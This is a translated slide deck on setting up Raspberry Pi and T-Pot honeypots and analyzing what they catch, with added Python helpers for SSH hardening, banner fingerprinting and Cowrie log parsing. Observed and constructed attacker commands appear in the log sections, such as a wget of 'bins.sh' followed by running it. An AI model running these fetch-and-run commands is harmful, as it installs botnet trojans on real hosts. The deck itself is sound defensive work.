honey-pot with raspberry-pi and T-Pot
kobad
May 28, 2017
Technology
Transcript
ROAD TO HONEY-POTTER (The road to becoming a honey-potter)

HONEY POTTER: Contents
▸ What is a honeypot?
▸ honeeepi
▸ t-pot
▸ Summary

HONEY POTTER: GOAL
▸ Become a beginner honey-potter
▸ Know that we are being attacked
▸ Learn how to build a honeypot and analyze what it records

HONEY POTTER: About the analysis
▸ Experience is what matters in log analysis (or so I hear)
▸ Since I am a beginner, I go as far as the tools let anyone go

THE HONEYNET PROJECT
▸ An international project (https://www.honeynet.org/)
▸ Develops open-source honeypot software
▸ Shares attack information, malware samples, and so on

WHAT IS A HONEYPOT?
▸ A honeypot is set up as a decoy, so no legitimate traffic should reach it. Every access it records is therefore unauthorized, which reduces false positives and eliminates missed detections. Its purposes include obtaining virus and worm samples, luring intruders away from important systems, and investigating intrusion techniques and trends from the recorded command and network logs. (From Wikipedia)

WHAT IS A HONEYPOT? Purposes (1)
▸ Obtain malware samples
▸ Collect and analyze logs to study attack techniques and trends (diagram: attack, log analysis)

WHAT IS A HONEYPOT? Purposes (2)
▸ Divert attacks away from real systems (diagram: attack)

WHAT IS A HONEYPOT? Types by interaction
▸ High-interaction: a real OS and real applications with actual vulnerabilities
▸ Low-interaction: emulates a specific OS or application

WHAT IS A HONEYPOT? Types by role
▸ Server type: waits for attacks to come in
▸ Client type: goes out and accesses suspicious servers

WHAT IS A HONEYPOT? Emulating every kind of service
▸ Database type: Mongo-DB HoneyProxy
▸ Web type: Glastopf, Dionaea
▸ SSH type: Kippo, Cowrie
▸ Malware collectors, etc.
▸ List: https://github.com/paralax/awesome-honeypots

HONEY POT: Operational cautions
▸ The honeypot itself can be vulnerable
▸ It can be turned into a pivot host or otherwise abused
▸ Proper configuration is required, e.g. restrict outbound traffic from the honeypot

HONEYPOT ON A RASPBERRY PI!

RASPI: An easy honeypot! HONEEEPI
▸ Wiki: https://redmine.honeynet.org/projects/honeeepi/wiki
▸ Raspbian customized for honeypot use
▸ Conpot, Dionaea, Glastopf, Kippo, Cowrie

HONEEEPI: CONPOT
▸ http://conpot.org/
▸ ICS/SCADA honeypot
▸ Emulates an industrial control system (system monitoring and process control)

HONEEEPI: DIONAEA
▸ https://github.com/gento/dionaea
▸ Named after the Venus flytrap, Dionaea muscipula
▸ Runs multiple applications
▸ FTP, TFTP, HTTP, HTTPS, SMB, SIP, MSSQL, MySQL

HONEEEPI: GLASTOPF
▸ http://mushmush.org/
▸ A honeypot specialized for the web
▸ Acts as a web application server, listens on port 80 and observes the attacks against it

HONEEEPI: KIPPO
▸ https://github.com/desaster/kippo
▸ SSH honeypot
▸ Shows how attackers connect
▸ Shows what they do after logging in
▸ Countermeasures against Kippo have appeared

HONEEEPI: COWRIE
▸ https://github.com/micheloosterhof/cowrie
▸ SSH honeypot
▸ An improved version of Kippo

HONEEEPI: Building HONEEEPI
▸ http://qiita.com/junk_coken/items/5ba04bf2381b3e51d621
▸ https://redmine.honeynet.org/projects/honeeepi/wiki

The build procedure is clear from the articles above, so...

HONEEEPI: Things to watch when building
▸ SSH settings
▸ Log output settings
▸ Detection evasion (Dionaea)

HONEEEPI: SSH settings
▸ Change the port (22 → ?????)
▸ RSA (public key) authentication
▸ Password authentication OFF
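The three SSH settings above can be checked mechanically before the Pi goes online. The following is an added example, not code from the deck or from honeeepi: it parses an sshd_config the way sshd does (first value of a repeated keyword wins, global section only) and audits it; the PermitRootLogin rule and the port value 2222 are assumptions of this example.

```python
import re

# Checks derived from the slide: move sshd off port 22, rely on (RSA) public-key
# authentication, and turn password authentication off. The root-login rule and
# the port value 2222 are assumptions of this example, not from the deck.
RULES = {
    "port": lambda v: v != "22",
    "pubkeyauthentication": lambda v: v.lower() == "yes",
    "passwordauthentication": lambda v: v.lower() == "no",
    "permitrootlogin": lambda v: v.lower() in ("no", "prohibit-password"),
}
# Values sshd applies when the keyword is absent (OpenSSH 7.x defaults).
DEFAULTS = {"port": "22", "pubkeyauthentication": "yes",
            "passwordauthentication": "yes", "permitrootlogin": "prohibit-password"}

def parse_sshd_config(text):
    """Keyword -> value for the global section of an sshd_config.
    sshd keeps the FIRST value of a repeated keyword and ignores '#' comments;
    keywords after a Match block are conditional, so parsing stops there."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        if len(parts) == 2:
            settings.setdefault(key, parts[1].strip())
    return settings

def audit_sshd_config(text):
    """Return 'keyword=value' for every effective setting that violates RULES."""
    settings = parse_sshd_config(text)
    return [f"{k}={settings.get(k, DEFAULTS[k])}"
            for k, ok in RULES.items() if not ok(settings.get(k, DEFAULTS[k]))]

# Constructed before/after configs for the Pi's management sshd.
WEAK = """
# stock defaults left in place
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""
HARDENED = """
# Port 2222 is an assumed value; the deck only says "22 -> ?????"
Port 2222
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
"""
```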
HONEEEPI: Log output settings
▸ Recording every log is too much
▸ Configure it to output only the logs you need (how to do this differs per honeypot)

HONEEEPI: Detection evasion (DIONAEA)
▸ nmap can sometimes identify the honeypot
▸ Left as is, it gets found out and nobody attacks it

HONEEEPI: Detection evasion (DIONAEA)
▸ Reading nmap's signatures shows where it is being detected (https://svn.nmap.org/nmap/nmap-service-probes)

HONEEEPI: Detection evasion (DIONAEA)
▸ FTP: identified by the response message
▸ It is compared with "Welcome to the ftp service"
▸ Changing the response message is enough

HONEEEPI: Detection evasion (DIONAEA)
▸ HTTP: the default response is detected
▸ Putting some file in the webroot is enough
▸ Place an index.html in /opt/dionaea/var/dionaea/wwwroot

HONEEEPI: Detection evasion (DIONAEA)
▸ MSSQL: the information in the pre-login TDS (Tabular Data Stream) packet is checked
▸ Rewrite the tokenType
▸ /opt/dionaea/lib/dionaea/python/dionaea/mssql/mssql.py
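To see for yourself "where it is being detected", the same matching nmap does can be replayed offline against your honeypot's banners. This is an added example, not code from the deck or from nmap: the probe entries below are constructed in the syntax of nmap-service-probes (`match <service> m<delim>regex<delim>[flags] p/<product>/`) and are not copied from the real file, and the default Dionaea greetings shown are assumptions of this example.

```python
import re

# Constructed entries in nmap-service-probes syntax. They illustrate the mechanism
# (a regex over the first bytes the service sends back); they are NOT the real
# signatures, and the honeypot default banners are assumptions of this example.
PROBE_LINES = r"""
# comment lines are skipped
match ftp m|^220 Welcome to the ftp service\r\n| p/Dionaea honeypot ftpd/
match http m|^HTTP/1\.0 200 OK\r\nContent-type: text/html\r\n\r\n<html><body>\r\n<h1>It works!</h1>|s p/Dionaea honeypot httpd/
match ftp m|^220 ProFTPD (\d[\d.]+) Server| p/ProFTPD/ v/$1/
"""

def parse_probes(text):
    """Return [(service, compiled_regex, product)] for every 'match' line."""
    out = []
    for line in text.splitlines():
        m = re.match(r"match\s+(\S+)\s+m(.)(.*?)\2([is]*)\s*(.*)$", line)
        if not m:
            continue
        service, _, pattern, flags, rest = m.groups()
        re_flags = (re.I if "i" in flags else 0) | (re.S if "s" in flags else 0)
        prod = re.search(r"p/([^/]*)/", rest)
        out.append((service, re.compile(pattern, re_flags), prod.group(1) if prod else None))
    return out

PROBES = parse_probes(PROBE_LINES)

def fingerprint(banner, probes=PROBES):
    """Product name the probe file would report for this banner, or None."""
    for _, regex, product in probes:
        if regex.search(banner):
            return product
    return None

def is_honeypot_banner(banner, probes=PROBES):
    """True when the banner is attributed to a honeypot product: time to change it."""
    product = fingerprint(banner, probes)
    return product is not None and "honeypot" in product.lower()

# Before: the assumed default Dionaea FTP greeting is attributed immediately.
DEFAULT_FTP = "220 Welcome to the ftp service\r\n"
# After: a changed greeting (wording is arbitrary) no longer hits the honeypot entry.
CHANGED_FTP = "220 FTP server ready.\r\n"
```

Feed the function the banner your sensor actually returns (read it from the socket with a short recv) and rerun after each change; the HTTP entry shows why an index.html in the webroot changes the matched bytes.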
VISUALIZATION

HONEEEPI: DIONAEAFR
▸ Log visualization tool
▸ Service, IP, Port, URL, Malware, Country

HONEEEPI: Caution
▸ Installing DionaeaFR on the Raspberry Pi is painful spec-wise
▸ Copy just the log files to a separate virtual machine or similar and view them there

HONEEEPI: SERVICE

HONEEEPI: MALWARE
▸ The hashes of the dropped binaries were searched on VirusTotal
▸ Requires integration with VirusTotal

HONEEEPI: COUNTRY
▸ More than half from China

HONEEEPI: IP

HONEEEPI: IP

HONEEEPI: Looking it up on AGUSE
▸ https://www.aguse.jp/
▸ A service that displays related information when you enter the URL of a site you want to investigate or the headers of a mail you received (quoted from the official site)
▸ Lets you safely investigate suspicious sites and mails

HONEEEPI: Checking the information at BARRACUDA CENTRAL
▸ The reason for being blacklisted is listed
▸ "poor": no detailed reason, apparently just bad

HONEEEPI: 123.207.23.254
▸ Abnormally large number of accesses
▸ There may be more activity from here on
▸ It may land on other blacklists in the future, so check periodically

HONEEEPI: Checking other IPs (ANOTHER IP)
▸ 167.160.182.27 - Florida, not blacklisted
▸ 115.182.95.66 - China, not blacklisted
▸ 36.111.34.139 - China, not blacklisted
▸ 123.57.255.171 - China, not blacklisted
▸ 211.149.200.156 -115.182.95.66 - China, not blacklisted
▸ 220.174.150.90 - China, not blacklisted
▸ 61.133.116.18 - China (Shandong Liaocheng), on 3 blacklists

HONEEEPI: 61.133.116.18
▸ On three blacklists: Barracuda Central, The Spamhaus Project and CBL

61.133.116.18: Looking at the CBL information
▸ http://www.abuseat.org/lookup.cgi
▸ This host had been infected with viruses acting as Trojan horses, ransomware and botnet clients
▸ h ttp ://n. hm ibl go j a.ru/ may be the source of the infection (do not connect to it)
▸ Checked on VirusTotal: malware was detected

T-POT

T-POT: T-POT
▸ http://dtag-dev-sec.github.io/mediator/feature/2016/03/11/t-pot-16.03.html
▸ A platform that automates everything from honeypot setup to log management and visualization tool setup
▸ Conpot, Cowrie, Dionaea, Elasticpot, eMobility, Glastopf, Honeytrap
▸ Suricata, ELK Stack
▸ Needs at least 4 GB of memory and 64 GB of disk

T-POT: ARCHITECTURE

T-POT: PORT layout

T-POT: INSTALLATION
▸ Build the ISO image
▸ Just boot it; the rest of the setup is done automatically

T-POT: CONPOT
▸ http://conpot.org/
▸ ICS/SCADA honeypot
▸ Emulates an industrial control system (system monitoring and process control)

T-POT: DIONAEA
▸ https://github.com/gento/dionaea
▸ Named after the Venus flytrap, Dionaea muscipula
▸ Runs multiple applications
▸ FTP, TFTP, HTTP, HTTPS, SMB, SIP, MSSQL, MySQL

T-POT: COWRIE
▸ https://github.com/micheloosterhof/cowrie
▸ SSH honeypot
▸ An improved version of Kippo

T-POT: GLASTOPF
▸ http://mushmush.org/
▸ A honeypot specialized for the web
▸ Acts as a web application server, listens on port 80 and observes the attacks against it

T-POT: ELASTICPOT
▸ https://hub.docker.com/r/honeynet/elasticpot/
▸ A honeypot that imitates Elasticsearch

T-POT: EMOBILITY
▸ https://github.com/dtag-dev-sec/emobility
▸ Collects data on attacks against infrastructure? (Attack for infrastructure?)

T-POT: HONEYTRAP
▸ Observes attacks on network services
▸ Emulates multiple network services
▸ Detects initial attacks

T-POT: SURICATA
▸ http://suricata-ids.org/features/
▸ Open-source IDS/IPS (intrusion detection system)

T-POT: ELK-STACK
▸ Elasticsearch
▸ Logstash
▸ Kibana
▸ Together they visualize the logs nicely

T-POT: ACCESS COUNT

T-POT: OS, SERVICE, COUNTRIES, USERNAME, PASSWORD, HISTOGRAM

T-POT: COUNTRIES

T-POT: IP, ASN, SURICATA ALERT

T-POT: DOCKER

T-POT: SYSTEM

T-POT: LOG

T-POT: LOG (HONEY TRAP)

T-POT: LOG (HONEY TRAP)

T-POT: Apparently not dangerous
▸ Does it occur on access from Windows?
▸ The size and hash of the data that was sent are shown, so it can be checked right away on VirusTotal and similar services

T-POT: LOG

T-POT: LOG
▸ wget http:// 185.73.147. 5/ bins.sh
▸ They are trying to download bins.sh
▸ Many variants with a different IP part were found as well

Looking up the hash...

T-POT: VIRUSTOTAL

T-POT: BINS.SH
▸ A Trojan horse
▸ Download attempts come from many IPs, so a large botnet has already formed
▸ Downloaded files are saved under /data/cowrie/downloads/, where the attacker cannot reach them

T-POT: BINS.SH
▸ Installs the commands needed so the host can be controlled from outside
▸ Executes, then deletes
▸ Repeats this to spread the infection
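The bins.sh observations above (many download attempts, differing only in the IP part, and a saved file whose hash goes to VirusTotal) can be pulled out of Cowrie's JSON log without a dashboard. This is an added example, not code from the deck or from Cowrie: the log lines are constructed (documentation IP ranges, made-up hash) and the event names and fields are the ones Cowrie's JSON output uses.

```python
import json
import re
from collections import Counter

# Constructed Cowrie JSON log lines, not captured from the deck's sensor; hosts use
# the documentation ranges 192.0.2.0/24 and 198.51.100.0/24, and the hash is made up.
SAMPLE_LOG = """
{"eventid":"cowrie.login.success","timestamp":"2017-05-01T10:00:00Z","src_ip":"198.51.100.7","session":"a1","username":"root","password":"admin"}
{"eventid":"cowrie.command.input","timestamp":"2017-05-01T10:00:02Z","src_ip":"198.51.100.7","session":"a1","input":"cd /tmp; wget http://192.0.2.10/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh"}
{"eventid":"cowrie.session.file_download","timestamp":"2017-05-01T10:00:03Z","src_ip":"198.51.100.7","session":"a1","url":"http://192.0.2.10/bins.sh","shasum":"constructed-sha256-0001","outfile":"/data/cowrie/downloads/constructed-sha256-0001"}
{"eventid":"cowrie.command.input","timestamp":"2017-05-01T11:30:00Z","src_ip":"198.51.100.8","session":"b2","input":"wget http://192.0.2.10/bins.sh -O /tmp/b; sh /tmp/b"}
{"eventid":"cowrie.command.input","timestamp":"2017-05-02T01:15:00Z","src_ip":"198.51.100.9","session":"c3","input":"busybox wget http://192.0.2.77/bins.sh; sh bins.sh"}
{"eventid":"cowrie.command.input","timestamp":"2017-05-02T02:00:00Z","src_ip":"198.51.100.9","session":"c3","input":"uname -a"}
"""

# A fetch command followed by a URL; the path group stops at whitespace or shell separators.
FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^;&|]*?(https?://([^/\s]+)/([^\s;&|]*))")

def events(text):
    """Yield one dict per non-empty line (Cowrie writes one JSON event per line)."""
    for line in text.splitlines():
        if line.strip():
            yield json.loads(line)

def fetch_attempts(text, filename="bins.sh"):
    """Download host -> number of distinct sessions that tried to fetch <filename>.
    Counting sessions rather than lines keeps one chatty attacker from inflating a host."""
    seen = set()
    for ev in events(text):
        if ev.get("eventid") != "cowrie.command.input":
            continue
        for _url, host, path in FETCH_RE.findall(ev["input"]):
            if path.rsplit("/", 1)[-1] == filename:
                seen.add((host, ev["session"]))
    return Counter(host for host, _ in seen)

def downloaded_hashes(text):
    """shasum -> source URL for every file Cowrie actually captured, i.e. the list
    to look up on VirusTotal; the files themselves sit under /data/cowrie/downloads/."""
    return {ev["shasum"]: ev["url"] for ev in events(text)
            if ev.get("eventid") == "cowrie.session.file_download"}
```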
Looking up 185.73.147.5 on AGUSE...

T-POT: SPAMHAUS
▸ https://www.spamhaus.org/

IoT

T-POT: T-POT
▸ A single ISO image sets everything up easily
▸ With ELK you can intuitively see when, from where and what kind of access is coming in

SUMMARY

HONEY POT: After one month of observation
▸ Under constant attack
▸ Attackers switch the targeted service between various (vulnerable) versions
▸ Many of the attacks against Cowrie tried to set up a back door
▸ Downloads of bins.sh

HONEY POT: SUMMARY
▸ Building a honeypot is easy
▸ We are attacked every day, every second!
▸ Thanks to visualization and tools, I managed to do something resembling analysis

HONEY POT: References and sources
▸ http://www.morihi-soc.net/
▸ http://qiita.com/junk_coken/items/5ba04bf2381b3e51d621
▸ http://blog.takanabe.tokyo/2015/04/24/293/
▸ https://www.securityartwork.es/2014/06/05/avoiding-dionaea-service-identification/

THANK YOU FOR LISTENING